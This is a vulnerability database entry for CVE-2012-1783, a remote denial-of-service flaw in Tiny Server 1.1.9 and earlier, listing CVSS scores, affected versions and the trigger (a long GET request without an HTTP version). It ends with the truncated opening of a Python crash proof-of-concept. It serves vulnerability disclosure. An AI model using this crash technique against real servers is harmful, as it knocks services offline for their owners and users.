7.8
CVSSv2

CVE-2012-1783

Published: 19/03/2012 Updated: 29/08/2017
CVSS v2 Base Score: 7.8 | Impact Score: 6.9 | Exploitability Score: 10
VMScore: 785
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C

Vulnerability Summary

Tiny Server 1.1.9 and previous versions allows remote malicious users to cause a denial of service (crash) via a long string in a GET request without an HTTP version number.

Vulnerable Product Search on Vulmon Subscribe to Product

saurabh gupta tiny server 1.0.5

saurabh gupta tiny server

saurabh gupta tiny server 1.1.5

Exploits

#!/usr/bin/python # Tiny HTTP Server <=v119 Remote Crash PoC # written by localh0t # Date: 24/02/11 # Contact: mattdch0@gmailcom # Follow: @mattdch # wwwlocalh0tcomar # Targets: Windows (All) import httplib,sys if (len(sysargv) < 3): print "\nTiny HTTP Server <=v119 Remote Crash PoC" print "\n Usage: %s <host> &l ...